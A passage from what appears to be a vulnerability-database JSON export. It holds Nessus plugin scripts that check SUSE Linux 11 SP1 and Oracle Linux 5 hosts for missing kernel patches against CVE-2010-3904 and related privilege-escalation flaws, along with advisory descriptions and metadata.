script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=624850\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=629901\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=629908\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=638860\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=639261\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=640278\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=643249\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=644219\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=644350\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=644373\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=646045\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=647392\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=647497\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=647775\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=648308\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=649231\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=649257\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=649820\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=650109\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=650111\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=650113\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=650116\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=650128\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.novell.com/security/cve/CVE-2010-2963.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.novell.com/security/cve/CVE-2010-3865.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.novell.com/security/cve/CVE-2010-3904.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply SAT patch number 3433 / 3436 / 3445 as appropriate.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Reliable Datagram Sockets (RDS) Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/01/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:btrfs-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:btrfs-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:btrfs-kmp-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:ext4dev-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:ext4dev-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:ext4dev-kmp-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:hyper-v-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:hyper-v-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-default-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-default-man\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-desktop-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-pae-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-pae-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-pae-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-trace\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-trace-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-trace-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-xen-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-xen-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2023 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 1) audit(AUDIT_OS_NOT, \"SuSE 11.1\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"btrfs-kmp-default-0_2.6.32.24_0.2-0.3.22\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"btrfs-kmp-pae-0_2.6.32.24_0.2-0.3.22\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"btrfs-kmp-xen-0_2.6.32.24_0.2-0.3.22\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"hyper-v-kmp-default-0_2.6.32.24_0.2-0.7.17\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"hyper-v-kmp-pae-0_2.6.32.24_0.2-0.7.17\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"kernel-default-2.6.32.24-0.2.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"kernel-default-base-2.6.32.24-0.2.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"kernel-default-devel-2.6.32.24-0.2.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"kernel-default-extra-2.6.32.24-0.2.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"kernel-desktop-devel-2.6.32.24-0.2.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"kernel-pae-2.6.32.24-0.2.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"kernel-pae-base-2.6.32.24-0.2.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"kernel-pae-devel-2.6.32.24-0.2.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"kernel-pae-extra-2.6.32.24-0.2.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"kernel-source-2.6.32.24-0.2.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"kernel-syms-2.6.32.24-0.2.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"kernel-xen-2.6.32.24-0.2.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"kernel-xen-base-2.6.32.24-0.2.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"kernel-xen-devel-2.6.32.24-0.2.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"kernel-xen-extra-2.6.32.24-0.2.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"btrfs-kmp-default-0_2.6.32.24_0.2-0.3.22\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"btrfs-kmp-xen-0_2.6.32.24_0.2-0.3.22\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"hyper-v-kmp-default-0_2.6.32.24_0.2-0.7.17\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"kernel-default-2.6.32.24-0.2.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"kernel-default-base-2.6.32.24-0.2.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"kernel-default-devel-2.6.32.24-0.2.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"kernel-default-extra-2.6.32.24-0.2.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"kernel-desktop-devel-2.6.32.24-0.2.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"kernel-source-2.6.32.24-0.2.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"kernel-syms-2.6.32.24-0.2.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"kernel-xen-2.6.32.24-0.2.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"kernel-xen-base-2.6.32.24-0.2.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"kernel-xen-devel-2.6.32.24-0.2.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"kernel-xen-extra-2.6.32.24-0.2.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"btrfs-kmp-default-0_2.6.32.24_0.2-0.3.22\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"ext4dev-kmp-default-0_2.6.32.24_0.2-7.3.22\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"kernel-default-2.6.32.24-0.2.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"kernel-default-base-2.6.32.24-0.2.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"kernel-default-devel-2.6.32.24-0.2.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"kernel-source-2.6.32.24-0.2.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"kernel-syms-2.6.32.24-0.2.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"kernel-trace-2.6.32.24-0.2.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"kernel-trace-base-2.6.32.24-0.2.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"kernel-trace-devel-2.6.32.24-0.2.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"btrfs-kmp-pae-0_2.6.32.24_0.2-0.3.22\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"btrfs-kmp-xen-0_2.6.32.24_0.2-0.3.22\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"ext4dev-kmp-pae-0_2.6.32.24_0.2-7.3.22\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"ext4dev-kmp-xen-0_2.6.32.24_0.2-7.3.22\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"hyper-v-kmp-default-0_2.6.32.24_0.2-0.7.17\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"hyper-v-kmp-pae-0_2.6.32.24_0.2-0.7.17\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"kernel-pae-2.6.32.24-0.2.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"kernel-pae-base-2.6.32.24-0.2.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"kernel-pae-devel-2.6.32.24-0.2.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"kernel-xen-2.6.32.24-0.2.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"kernel-xen-base-2.6.32.24-0.2.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"kernel-xen-devel-2.6.32.24-0.2.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"kernel-default-man-2.6.32.24-0.2.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"btrfs-kmp-xen-0_2.6.32.24_0.2-0.3.22\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"ext4dev-kmp-xen-0_2.6.32.24_0.2-7.3.22\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"hyper-v-kmp-default-0_2.6.32.24_0.2-0.7.17\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"kernel-xen-2.6.32.24-0.2.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"kernel-xen-base-2.6.32.24-0.2.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"kernel-xen-devel-2.6.32.24-0.2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:18:07", "description": "This update of the SUSE Linux Enterprise Server 11 SP1 kernel brings the kernel to 2.6.32.24 and fixes some critical security bugs and other non-security bugs.\n\nFollowing security bugs were fixed :\n\n - A iovec integer overflow in RDS sockets was fixed which could lead to local attackers gaining kernel privileges.\n (CVE-2010-3865)\n\n - A local privilege escalation in RDS sockets allowed local attackers to gain privileges. Please note that the net/rds socket protocol module only lives in the.\n (CVE-2010-3904)\n\n -extra kernel package, which is not installed by default on the SUSE Linux Enterprise Server 11.\n\n - A problem in the compat ioctl handling in video4linux allowed local attackers with a video device plugged in to gain privileges on x86_64 systems. (CVE-2010-2963)", "cvss3": {}, "published": "2011-01-21T00:00:00", "type": "nessus", "title": "SuSE 11.1 Security Update : Linux kernel (SAT Patch Numbers 3462 / 3463)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2963", "CVE-2010-3865", "CVE-2010-3904"], "modified": "2023-05-14T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:kernel-ec2", "p-cpe:/a:novell:suse_linux:11:kernel-ec2-base", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_11_KERNEL-EC2-101103.NASL", "href": "https://www.tenable.com/plugins/nessus/51615", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(51615);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2010-2963\", \"CVE-2010-3865\", \"CVE-2010-3904\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"SuSE 11.1 Security Update : Linux kernel (SAT Patch Numbers 3462 / 3463)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SuSE 11 host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update of the SUSE Linux Enterprise Server 11 SP1 kernel brings\nthe kernel to 2.6.32.24 and fixes some critical security bugs and\nother non-security bugs.\n\nFollowing security bugs were fixed :\n\n - A iovec integer overflow in RDS sockets was fixed which\n could lead to local attackers gaining kernel privileges.\n (CVE-2010-3865)\n\n - A local privilege escalation in RDS sockets allowed\n local attackers to gain privileges. Please note that the\n net/rds socket protocol module only lives in the.\n (CVE-2010-3904)\n\n -extra kernel package, which is not installed by default\n on the SUSE Linux Enterprise Server 11.\n\n - A problem in the compat ioctl handling in video4linux\n allowed local attackers with a video device plugged in\n to gain privileges on x86_64 systems. (CVE-2010-2963)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=564324\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=573330\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=603738\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=609196\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=612729\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=623307\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=624850\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=629901\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=629908\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=638860\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=639261\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=640278\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=643249\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=644219\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=644350\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=644373\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=646045\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=647392\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=647497\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=647775\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=648308\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=649231\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=649257\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=649820\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=650109\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=650111\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=650113\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=650116\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=650128\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.novell.com/security/cve/CVE-2010-2963.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.novell.com/security/cve/CVE-2010-3865.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.novell.com/security/cve/CVE-2010-3904.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply SAT patch number 3462 / 3463 as appropriate.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Reliable Datagram Sockets (RDS) Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/01/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-ec2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:kernel-ec2-base\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2023 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 1) audit(AUDIT_OS_NOT, \"SuSE 11.1\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"kernel-ec2-2.6.32.24-0.2.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"kernel-ec2-base-2.6.32.24-0.2.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"kernel-ec2-2.6.32.24-0.2.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"kernel-ec2-base-2.6.32.24-0.2.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:20:58", "description": "Description of changes:\n\nFollowing Security bug are fixed in this errata\n\nCVE-2010-3904 When copying data to userspace, the RDS protocol failed to verify that the user-provided address was a valid userspace address. A local unprivileged user could issue specially crafted socket calls to write arbitrary values into kernel memory and potentially escalate privileges to root.\n\nCVE-2010-3067 Integer overflow in the do_io_submit function in fs/aio.c in the Linux kernel before 2.6.36-rc4-next-20100915 allows local users to cause a denial of service or possibly have unspecified other impact via crafted use of the io_submit system call.\n\nCVE-2010-3477 The tcf_act_police_dump function in net/sched/act_police.c in the actions implementation in the network queueing functionality in the Linux kernel before 2.6.36-rc4 does not properly initialize certain structure members, which allows local users to obtain potentially sensitive information from kernel memory via vectors involving a dump operation. NOTE: this vulnerability exists because of an incomplete fix for CVE-2010-2942.\n\nkernel:\n\n[2.6.32-100.21.1.el5]\n- [rds] fix access issue with rds (Chris Mason) {CVE-2010-3904}\n- [fuse] linux-2.6.32-fuse-return-EGAIN-if-not-connected-bug-10154489.patch\n- [net] linux-2.6.32-net-sched-fix-kernel-leak-in-act_police.patch\n- [aio] linux-2.6.32-aio-check-for-multiplication-overflow-in-do_io_subm.patch\n\nofa:\n\n[1.5.1-4.0.23]\n- Fix rds permissions checks during copies\n\n[1.5.1-4.0.21]\n- Update to BXOFED 1.5.1-1.3.6-5", "cvss3": {}, "published": "2013-07-12T00:00:00", "type": "nessus", "title": "Oracle Linux 5 : Unbreakable Enterprise kernel (ELSA-2010-2009)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2942", "CVE-2010-3067", "CVE-2010-3477", "CVE-2010-3904"], "modified": "2023-05-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:kernel", "p-cpe:/a:oracle:linux:kernel-debug", "p-cpe:/a:oracle:linux:kernel-debug-devel", "p-cpe:/a:oracle:linux:kernel-devel", "p-cpe:/a:oracle:linux:kernel-doc", "p-cpe:/a:oracle:linux:kernel-firmware", "p-cpe:/a:oracle:linux:kernel-headers", "p-cpe:/a:oracle:linux:ofa-2.6.32-100.21.1.el5", "cpe:/o:oracle:linux:5"], "id": "ORACLELINUX_ELSA-2010-2009.NASL", "href": "https://www.tenable.com/plugins/nessus/68173", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2010-2009.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(68173);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\n \"CVE-2010-2942\",\n \"CVE-2010-3067\",\n \"CVE-2010-3477\",\n \"CVE-2010-3904\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", 